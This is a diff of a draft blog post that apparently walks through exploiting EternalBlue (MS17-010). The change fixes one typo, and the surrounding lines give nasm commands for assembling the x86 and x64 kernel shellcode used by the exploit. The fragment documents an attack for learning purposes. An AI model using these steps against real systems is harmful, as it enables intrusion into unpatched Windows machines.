hzsolt21/hzsolt21.github.io/_drafts/EternalBlue.markdown

 cd MS17-010/
 ```
 We will focus on the shellcode first. going into the folder shellcode and reading the file eternalblue_sc_merge.py we can get an idea how to create our shellcode and use it with this exploit.
-First we need to assemblée the shell code
+First we need to assemble the shell code
 ```
 nasm -f bin eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
 nasm -f bin eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin